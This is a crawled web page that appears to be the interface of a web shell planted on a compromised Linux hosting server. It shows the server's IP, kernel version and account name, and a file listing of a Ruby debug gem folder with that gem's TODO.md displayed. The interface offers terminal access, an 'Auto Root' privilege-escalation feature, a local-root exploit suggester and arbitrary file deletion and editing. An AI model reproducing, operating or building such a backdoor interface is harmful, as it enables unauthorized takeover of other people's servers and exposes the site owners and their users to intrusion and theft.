Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby31 /
share /
gems /
gems /
debug-1.6.3 /
Delete
Unzip
Name
Size
Permission
Date
Action
exe
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
lib
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
misc
[ DIR ]
drwxr-xr-x
2026-05-01 04:23
CONTRIBUTING.md
14.15
KB
-rw-r--r--
2025-04-28 21:06
Gemfile
134
B
-rw-r--r--
2025-04-28 21:06
LICENSE.txt
1.25
KB
-rw-r--r--
2025-04-28 21:06
README.md
35.46
KB
-rw-r--r--
2025-04-28 21:06
Rakefile
1.52
KB
-rw-r--r--
2025-04-28 21:06
TODO.md
536
B
-rw-r--r--
2025-04-28 21:06
exts.mk
1.97
KB
-rw-r--r--
2025-04-28 21:06
Save
Rename
# TODO ## Basic functionality * Support Ractors * Signal (SIGINT) trap handling ## UI * Completion for Ruby's code * Interactive breakpoint setting * Interactive record & play debugging * irb integration * Web browser integrated UI * History file ## Debug command * Breakpoints * Lightweight pending method break points with Ruby 3.1 feature (TP:method_added) * Watch points * Lightweight watchpoints for instance variables with Ruby 3.1 features (TP:ivar_set) * Faster `next`/`finish` command by specifying target code.